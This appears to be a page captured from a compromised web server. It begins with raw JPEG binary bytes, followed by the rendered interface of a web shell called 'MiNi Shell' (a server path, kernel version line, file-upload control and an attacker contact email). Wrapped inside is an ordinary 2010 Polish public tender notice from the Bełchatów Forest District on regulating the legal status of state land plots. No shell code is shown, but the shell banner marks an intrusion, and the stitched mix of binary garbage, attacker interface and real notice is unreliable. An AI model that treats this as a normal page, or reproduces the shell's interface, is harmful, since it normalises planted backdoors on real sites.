JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100915/291750-N-2010.html

<p class="kh_header"><b>Bełchatów: Regulacje stanów prawnych nieruchomości Skarbu Państwa będących w zarządzie Nadleśnictwa Bełchatów</b><br>
<b>Numer ogłoszenia: 291750 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bełchatów , ul. Lipowa 175, 97-400 Bełchatów, woj. łódzkie, tel. 044 635 72 01, faks 044 632 42 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lodz.lasy.gov.pl/web/belchatow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Regulacje stanów prawnych nieruchomości Skarbu Państwa będących w zarządzie Nadleśnictwa Bełchatów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Regulacje stanów prawnych nieruchomości Skarbu Państwa w zarządzie Nadleśnictwa Bełchatów dla 522 działek
Zadanie zostało podzielone na 3 części. Zakres czynności do wykonania w każdej z części składa się z:
- weryfikacja części opisowej operatu ewidencji gruntów na podstawie dowodów zmian w zakresie wpisów dotyczących właściciela, numeru działki oraz numeru Księgi Wieczystej,
- przeprowadzenie badania Ksiąg Wieczystych, w szczególności akt postępowania celem określenia wszystkich składników - działek opisanych w dziale I KW
- odnalezienie i pozyskanie uwierzytelnionych duplikatów decyzji administracyjnych oraz protokołów zdawczo- odbiorczych dotyczących przekazania gruntów na rzecz Skarbu Państwa Nadleśnictwa Bełchatów.
- pozyskanie zaświadczeń o przejęciu na Skarb Państwa
- wykonanie w odpowiedniej ilości egzemplarzy wyrysów z map ewidencyjnych wraz z wypisami z rejestru gruntów, 
- sporządzenie map do celów prawnych w przypadku zaistnienia takiej konieczności,
- wykonanie wykazów zmian gruntowych (w przypadku wystąpienia podziałów nieruchomości)
- w przypadku braku lub niezgodności w KW wykonanie uwierzytelnionego odpisu decyzji administracyjnych wraz z dokumentacją geodezyjno - prawną umożliwiającą  założenie Księgi Wieczystej i wpisanie Skarbu Państwa  PGL LP Nadleśnictwa Bełchatów.
- złożenie wniosków o sprostowanie zapisów w ewidencji,
- sporządzenie i złożenie wniosków o zasiedzenie,
- sporządzenie wniosków o założenie KW,
- złożenie wniosków o założenie KW w Sądzie Rejonowym  - Wydział Ksiąg Wieczystych w oparciu o udzielone pełnomocnictwo,
- monitorowanie realizacji wniosków o założenie lub wpis w KW, aż do uzyskania zawiadomienia o dokonaniu żądanego wpisu,
- ewentualne inne prace nie wymienione w/w specyfikacji a mogące mieć wpływ na prawidłowe wykonanie regulacji stanu prawnego
Zamawiający nie jest w stanie określić jaki zakres zadań jest do wykonania w poszczególnych częściach zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.00.00-6, 71.35.43.00-7, 79.13.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 300.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Z dokumentu powinno wynikać, kto jest uprawniony do podpisywania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 3 usług  (niezależnie od ilości części, na które będzie składał ofertę Wykonawca) odpowiadających swoim charakterem przedmiotowi zamówienia każde na kwotę brutto co najmniej  90 000 zł  z załączonymi referencjami lub innymi dokumentami potwierdzającymi należyte jego wykonanie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób będących w dyspozycji Wykonawcy, posiadających wymagane uprawnienia ustawowe wynikające a postanowień art. 43 ustawy z dnia 17.05.1989 r. - Prawo geodezyjne i kartograficzne (Dz. U. nr 240 poz.2027 z 2005 r.) w zakresie geodezyjnych pomiarów sytuacyjno-wysokościowych oraz rozgraniczania i podziału nieruchomości (gruntów), oraz sporządzania dokumentacji do celów prawnych. - co najmniej 3 osoby, niezależnie od ilości części, na które będzie składał ofertę Wykonawca. Należy dołączyć potwierdzone za zgodność z oryginałem kopię posiadanych przez ww. osoby wymaganych uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony w zakresie odpowiedzialności cywilnej. Kwota ubezpieczenia winna wynosić co najmniej 40 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art. 26 ust 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Upoważnienie do podpisania oferty o ile nie wynika ono ze złożonych dokumentów
3. Pełnomocnictwo, ustalające pełnomocnika (lidera) do reprezentowania podmiotów występujących wspólnie (spółka cywilna, konsorcjum).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany w zawartej umowy pod następującymi warunkami:
- zmiana umownego terminu realizacji:
1) wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwolą na prawidłowe i terminowe wykonanie zamówienia, (np. zdarzenia losowe, czynniki atmosferyczne itp.).
2) wystąpią przedłużające się  procedury administracyjne,
- czynniki uzasadniające zmianę osób odpowiedzialnych za wykonanie Zamówienia: 
1) śmierć, ciężka lub długotrwała choroba,
2) nie wywiązywania się osób z obowiązków wynikających z umowy,
3) rezygnacja tych osób z wykonywania swoich obowiązków
wprowadzona zmiana nie może spowodować zmiany Wykonawcy zamówienia.
- dopuszcza się zmianę pozostałych zapisów umowy, pod warunkiem, że:
1) z powodu działania osób trzecich, wykonanie prac będzie niemożliwe, a działania te nie są konsekwencją winy którejkolwiek ze stron,
2) realizacja części przedmiotu zamówienia z przyczyn o obiektywnym charakterze nie jest możliwa do wykonania,
3) wystąpi przekazanie działki lub jej części na rzecz innych podmiotów,
4) zmiana treści umowy jest korzystna dla zamawiającego,
5) Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lodz/nadl_belchatow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Nadleśnictwa Bełchatów ul. Lipowa 175, 97-400 Bełchatów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 09:00, miejsce: siedziba Nadleśnictwa Bełchatów ul. Lipowa 175, 97-400 Bełchatów, sekretariat - pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Regulacje stanów prawnych nieruchomości Skarbu Państwa w zarządzie Nadleśnictwa Bełchatów dla 129 działek.
Zadanie zostało podzielone na 3 części. Zakres czynności do wykonania w każdej z części składa się z:
- weryfikacja części opisowej operatu ewidencji gruntów na podstawie dowodów zmian w zakresie wpisów dotyczących właściciela, numeru działki oraz numeru Księgi Wieczystej,
- przeprowadzenie badania Ksiąg Wieczystych, w szczególności akt postępowania celem określenia wszystkich składników - działek opisanych w dziale I KW
- odnalezienie i pozyskanie uwierzytelnionych duplikatów decyzji administracyjnych oraz protokołów zdawczo- odbiorczych dotyczących przekazania gruntów na rzecz Skarbu Państwa Nadleśnictwa Bełchatów.
- pozyskanie zaświadczeń o przejęciu na Skarb Państwa
- wykonanie w odpowiedniej ilości egzemplarzy wyrysów z map ewidencyjnych wraz z wypisami z rejestru gruntów, 
- sporządzenie map do celów prawnych w przypadku zaistnienia takiej konieczności,
- wykonanie wykazów zmian gruntowych (w przypadku wystąpienia podziałów nieruchomości)
- w przypadku braku lub niezgodności w KW wykonanie uwierzytelnionego odpisu decyzji administracyjnych wraz z dokumentacją geodezyjno - prawną umożliwiającą  założenie Księgi Wieczystej i wpisanie Skarbu Państwa  PGL LP Nadleśnictwa Bełchatów.
- złożenie wniosków o sprostowanie zapisów w ewidencji,
- sporządzenie i złożenie wniosków o zasiedzenie,
- sporządzenie wniosków o założenie KW,
- złożenie wniosków o założenie KW w Sądzie Rejonowym  - Wydział Ksiąg Wieczystych w oparciu o udzielone pełnomocnictwo,
- monitorowanie realizacji wniosków o założenie lub wpis w KW, aż do uzyskania zawiadomienia o dokonaniu żądanego wpisu,
- ewentualne inne prace nie wymienione w/w specyfikacji a mogące mieć wpływ na prawidłowe wykonanie regulacji stanu prawnego
Zamawiający nie jest w stanie określić jaki zakres zadań jest do wykonania w poszczególnych częściach zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.00.00-6, 71.35.43.00-7, 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 300.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Regulacje stanów prawnych nieruchomości Skarbu Państwa w zarządzie Nadleśnictwa Bełchatów dla 233 działek.
Zadanie zostało podzielone na 3 części. Zakres czynności do wykonania w każdej z części składa się z:
- weryfikacja części opisowej operatu ewidencji gruntów na podstawie dowodów zmian w zakresie wpisów dotyczących właściciela, numeru działki oraz numeru Księgi Wieczystej,
- przeprowadzenie badania Ksiąg Wieczystych, w szczególności akt postępowania celem określenia wszystkich składników - działek opisanych w dziale I KW
- odnalezienie i pozyskanie uwierzytelnionych duplikatów decyzji administracyjnych oraz protokołów zdawczo- odbiorczych dotyczących przekazania gruntów na rzecz Skarbu Państwa Nadleśnictwa Bełchatów.
- pozyskanie zaświadczeń o przejęciu na Skarb Państwa
- wykonanie w odpowiedniej ilości egzemplarzy wyrysów z map ewidencyjnych wraz z wypisami z rejestru gruntów, 
- sporządzenie map do celów prawnych w przypadku zaistnienia takiej konieczności,
- wykonanie wykazów zmian gruntowych (w przypadku wystąpienia podziałów nieruchomości)
- w przypadku braku lub niezgodności w KW wykonanie uwierzytelnionego odpisu decyzji administracyjnych wraz z dokumentacją geodezyjno - prawną umożliwiającą  założenie Księgi Wieczystej i wpisanie Skarbu Państwa  PGL LP Nadleśnictwa Bełchatów.
- złożenie wniosków o sprostowanie zapisów w ewidencji,
- sporządzenie i złożenie wniosków o zasiedzenie,
- sporządzenie wniosków o założenie KW,
- złożenie wniosków o założenie KW w Sądzie Rejonowym  - Wydział Ksiąg Wieczystych w oparciu o udzielone pełnomocnictwo,
- monitorowanie realizacji wniosków o założenie lub wpis w KW, aż do uzyskania zawiadomienia o dokonaniu żądanego wpisu,
- ewentualne inne prace nie wymienione w/w specyfikacji a mogące mieć wpływ na prawidłowe wykonanie regulacji stanu prawnego
Zamawiający nie jest w stanie określić jaki zakres zadań jest do wykonania w poszczególnych częściach zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.00.00-6, 71.35.43.00-7, 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 300.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Regulacje stanów prawnych nieruchomości Skarbu Państwa w zarządzie Nadleśnictwa Bełchatów dla 160 działek.
Zadanie zostało podzielone na 3 części. Zakres czynności do wykonania w każdej z części składa się z:
- weryfikacja części opisowej operatu ewidencji gruntów na podstawie dowodów zmian w zakresie wpisów dotyczących właściciela, numeru działki oraz numeru Księgi Wieczystej,
- przeprowadzenie badania Ksiąg Wieczystych, w szczególności akt postępowania celem określenia wszystkich składników - działek opisanych w dziale I KW
- odnalezienie i pozyskanie uwierzytelnionych duplikatów decyzji administracyjnych oraz protokołów zdawczo- odbiorczych dotyczących przekazania gruntów na rzecz Skarbu Państwa Nadleśnictwa Bełchatów.
- pozyskanie zaświadczeń o przejęciu na Skarb Państwa
- wykonanie w odpowiedniej ilości egzemplarzy wyrysów z map ewidencyjnych wraz z wypisami z rejestru gruntów, 
- sporządzenie map do celów prawnych w przypadku zaistnienia takiej konieczności,
- wykonanie wykazów zmian gruntowych (w przypadku wystąpienia podziałów nieruchomości)
- w przypadku braku lub niezgodności w KW wykonanie uwierzytelnionego odpisu decyzji administracyjnych wraz z dokumentacją geodezyjno - prawną umożliwiającą  założenie Księgi Wieczystej i wpisanie Skarbu Państwa  PGL LP Nadleśnictwa Bełchatów.
- złożenie wniosków o sprostowanie zapisów w ewidencji,
- sporządzenie i złożenie wniosków o zasiedzenie,
- sporządzenie wniosków o założenie KW,
- złożenie wniosków o założenie KW w Sądzie Rejonowym  - Wydział Ksiąg Wieczystych w oparciu o udzielone pełnomocnictwo,
- monitorowanie realizacji wniosków o założenie lub wpis w KW, aż do uzyskania zawiadomienia o dokonaniu żądanego wpisu,
- ewentualne inne prace nie wymienione w/w specyfikacji a mogące mieć wpływ na prawidłowe wykonanie regulacji stanu prawnego
Zamawiający nie jest w stanie określić jaki zakres zadań jest do wykonania w poszczególnych częściach zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.00.00-6, 71.35.43.00-7, 79.13.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 300.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com